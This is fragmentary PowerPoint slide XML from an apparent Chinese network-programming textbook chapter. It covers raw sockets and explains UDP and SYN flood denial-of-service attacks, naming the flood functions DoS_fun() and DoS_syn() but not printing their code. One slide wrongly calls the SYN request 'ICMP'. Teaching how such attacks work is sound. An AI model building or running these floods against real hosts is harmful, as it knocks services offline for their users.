              </a:rPr>
              <a:t>程序活动标志</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="-25000" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>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109603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13.2.1  SOCK_RAW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>选项</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smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>创建原始套接字使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>socket()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>函数。下面的代码创建一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>AF_INET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>协议族中的原始套接字，协议类型为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>。</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int rawsock = socket(AF_INET, SOCK_RAW, protocol);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IPPROTO_IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>协议，接收或者发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>数据包，包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>头部。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IPPROTO_ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>协议，接收或者发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>的数据包，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>的头部不需要处理。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IPPROTO_TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>协议，接收或者发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>数据包。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IPPROTO_UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>协议，接收或者发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>数据包。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IPPROTO_RAW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>：原始</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>包。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3914782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13.9  UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>洪水攻击</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本程序建立了一个固定的结构，将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>头部和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>头部均包含在内，设置数据完毕后，可以直接发向目标机。与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>13.8.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>节中一样，本程序使用了多线程。</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>CRC16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>校验计算代码</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>发送的核心处理函数代码</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）线程函数为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>DoS_fun()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>代码</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）主函数处理过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="231940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13.10  SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>洪水攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>13.10.1  SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>洪水攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>原理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>13.10.2  SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>洪水攻击的例子</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3948326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13.10.1  SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>洪水攻击的原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>攻击利用第二次握手的手段如下：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>请求给主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>，主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>发送的报文的源地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>是一个伪造的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>。主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>的第二次握手之后要等待一段时间，接收主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>的确认包，在超时时间内此资源一直在占用。如果主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>的处理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>三次握手的资源不能满足处理主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>请求数量，则主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>的可用资源就会慢慢减少，直到耗尽。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>发送的报文是原始报文，发送报文的速度可以达到很高，因此有足够的资源能对目标机造成影响。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10242" name="Picture 2" descr="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5460256"/>
            <a:ext cx="3898900"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4194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13.10.2  SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>洪水攻击的例子</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smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>上面对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>进行攻击的原理进行了简单的介绍，下面分析一下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>攻击的核心代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>DoS_syn()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRP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）先建立一个结构</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>dosseg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
